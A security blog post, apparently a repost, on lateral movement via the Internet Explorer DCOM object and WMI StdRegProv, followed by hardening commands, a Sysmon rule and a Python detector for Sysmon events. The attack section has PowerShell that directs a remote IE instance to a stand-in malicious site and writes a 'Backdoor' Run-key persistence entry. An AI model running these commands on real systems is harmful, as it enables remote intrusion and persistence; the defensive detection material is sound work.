Lateral Movement Using Internet Explorer DCOM Object and StdRegProv


Lateral movement is a critical phase in cyber attacks, allowing adversaries to traverse a network after initial compromise. One advanced technique involves leveraging the Internet Explorer DCOM (Distributed Component Object Model) object and the StdRegProv WMI class to execute code remotely and manipulate registry keys.

You Should Know:

1. Understanding DCOM and Internet Explorer Exploitation

DCOM enables communication between software components across networked devices. Attackers abuse this feature to execute malicious code remotely via Internet Explorer’s COM interface.

Exploitation Command (via PowerShell):

$com = [System.Activator]::CreateInstance([System.Type]::GetTypeFromProgID("InternetExplorer.Application", "TARGET_IP"))
$com.Visible = $true   # makes the IE window visible (optional for stealth)
$com.Navigate2("http://malicious-site.com/exploit.html")

2. Leveraging StdRegProv for Registry Manipulation

The StdRegProv WMI class allows attackers to query, modify, or delete registry keys remotely, aiding persistence or privilege escalation.

Example: Enumerating Registry Keys

Invoke-WmiMethod -Namespace "root\default" -Class StdRegProv -Name EnumKey -ComputerName "TARGET_IP" -ArgumentList 2147483650, "Software\Microsoft\Windows\CurrentVersion"   # 2147483650 = HKEY_LOCAL_MACHINE; the sNames property of the result holds the subkey names

Modifying a Registry Key (Persistence):

$reg = [wmiclass]"\\TARGET_IP\root\default:StdRegProv"
$reg.SetStringValue(2147483650, "Software\Microsoft\Windows\CurrentVersion\Run", "Backdoor", "C:\malware.exe")   # 2147483650 = HKEY_LOCAL_MACHINE

3. Defensive Measures (Blue Team)

  • Restrict DCOM Access (machine-wide; this also breaks legitimate DCOM clients, so where that is not acceptable, scope DCOM launch and access permissions with dcomcnfg instead):
    Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Ole" -Name "EnableDCOM" -Value "N"

  • Monitor WMI Activity:
    Get-WinEvent -LogName "Microsoft-Windows-WMI-Activity/Operational" | Where-Object {$_.Id -eq 5861}

  • Restrict Anonymous Access (RestrictAnonymous, also deployable via GPO):
    reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "RestrictAnonymous" /t REG_DWORD /d 1 /f

4. Detection with Sysmon (Example Rule)

<RuleGroup name="DCOM Abuse" groupRelation="or">
  <ProcessCreate onmatch="include">
    <CommandLine condition="contains">InternetExplorer.Application</CommandLine>
  </ProcessCreate>
</RuleGroup>
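The Sysmon rule above matches the ProgID in a command line, which only fires on the host the attacker types the PowerShell on. On the targeted host the traces of sections 1 and 2 look different: the DCOM-activated iexplore.exe is started by the DcomLaunch service host (svchost.exe), and a remote StdRegProv write to the Run key is performed by WmiPrvSE.exe, which Sysmon records as a RegistryEvent (Event ID 13) if the Run key is in its RegistryEvent filter. The following Python detector, added here as an example and not part of the original post or any vendor tool, parses Sysmon events in their XML form and flags all three patterns. The sample events, host names and the `C:\malware.exe` value are constructed to mirror the post's own example.

```python
"""Detect host-side traces of IE DCOM lateral movement and StdRegProv Run-key
persistence in Sysmon XML events (constructed example, not Sysmon's own tooling).
"""
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

NS = "{http://schemas.microsoft.com/win/2004/08/events/event}"
# Autostart locations written by the StdRegProv example in the post.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)


def _basename(path):
    """Lower-cased file name of a Windows path ('' when the field is absent)."""
    return PureWindowsPath(path).name.lower() if path else ""


def parse_events(xml_text):
    """Yield (event_id, computer, {Data Name: value}) for each <Event> element."""
    root = ET.fromstring(xml_text)
    for ev in root.iter(NS + "Event"):
        event_id = int(ev.findtext(NS + "System/" + NS + "EventID"))
        computer = ev.findtext(NS + "System/" + NS + "Computer") or ""
        data = {d.get("Name"): (d.text or "")
                for d in ev.iterfind(NS + "EventData/" + NS + "Data")}
        yield event_id, computer, data


def detect(xml_text):
    """Return (rule, computer, detail) tuples for suspicious events."""
    alerts = []
    for event_id, computer, d in parse_events(xml_text):
        image = _basename(d.get("Image"))
        if event_id == 1:  # ProcessCreate
            # Source-host trace: the post's Sysmon rule, ProgID in a command line.
            if "internetexplorer.application" in d.get("CommandLine", "").lower():
                alerts.append(("dcom-ie-progid-in-cmdline", computer, d.get("CommandLine")))
            # Target-host trace: IE activated out-of-process by DcomLaunch (svchost.exe).
            if image == "iexplore.exe" and _basename(d.get("ParentImage")) == "svchost.exe":
                alerts.append(("iexplore-spawned-by-dcomlaunch", computer, d.get("Image")))
        elif event_id == 13:  # RegistryEvent (value set)
            # Target-host trace: the WMI provider host writing an autostart value.
            target = d.get("TargetObject", "")
            if image == "wmiprvse.exe" and RUN_KEY_RE.search(target):
                alerts.append(("run-key-write-via-wmi", computer, target + " = " + d.get("Details", "")))
    return alerts


# Constructed sample: one benign process start, the two DCOM traces, one WMI
# Run-key write and one benign registry write. Real exports carry more fields.
SAMPLE_EVENTS = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>1</EventID><Computer>WS01</Computer></System>
 <EventData>
  <Data Name="Image">C:\Windows\System32\notepad.exe</Data>
  <Data Name="ParentImage">C:\Windows\explorer.exe</Data>
  <Data Name="CommandLine">notepad.exe notes.txt</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>1</EventID><Computer>WS01</Computer></System>
 <EventData>
  <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
  <Data Name="ParentImage">C:\Windows\System32\cmd.exe</Data>
  <Data Name="CommandLine">powershell.exe -c [Type]::GetTypeFromProgID('InternetExplorer.Application','TARGET_IP')</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>1</EventID><Computer>TARGET-HOST</Computer></System>
 <EventData>
  <Data Name="Image">C:\Program Files\Internet Explorer\iexplore.exe</Data>
  <Data Name="ParentImage">C:\Windows\System32\svchost.exe</Data>
  <Data Name="CommandLine">"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>13</EventID><Computer>TARGET-HOST</Computer></System>
 <EventData>
  <Data Name="Image">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
  <Data Name="TargetObject">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Backdoor</Data>
  <Data Name="Details">C:\malware.exe</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>13</EventID><Computer>TARGET-HOST</Computer></System>
 <EventData>
  <Data Name="Image">C:\Windows\regedit.exe</Data>
  <Data Name="TargetObject">HKCU\Software\Contoso\App\Theme</Data>
  <Data Name="Details">dark</Data>
 </EventData>
</Event>
</Events>"""

if __name__ == "__main__":
    for rule, host, detail in detect(SAMPLE_EVENTS):
        print(f"{host}: {rule}: {detail}")
```

To run it against a live host, export events with `Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" | ForEach-Object { $_.ToXml() }`, wrap the output in a single root element and pass it to `detect`. The `-Embedding` switch in the sample is the argument COM-activated servers are normally started with, so the `iexplore-spawned-by-dcomlaunch` rule will also catch IE launched by local COM clients; treat it as a lead to correlate with the source-host rule and with WMI-Activity logging rather than as a verdict on its own.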

What Undercode Say:

Lateral movement via DCOM and WMI is stealthy but leaves traces. Defenders must:
– Audit WMI/DCOM permissions.
– Log registry modifications (e.g. baseline with reg query "KeyPath" /s and compare).
– Use Sysinternals tools (procmon.exe for real-time monitoring).
– Restrict WinRM/PowerShell remoting (Disable-WSManCredSSP -Role Server).

Expected Output:

A hardened network where DCOM/WMI misuse triggers alerts, and registry changes are logged for forensic analysis.


Reported By: Florian Hansemann – Hackers Feeds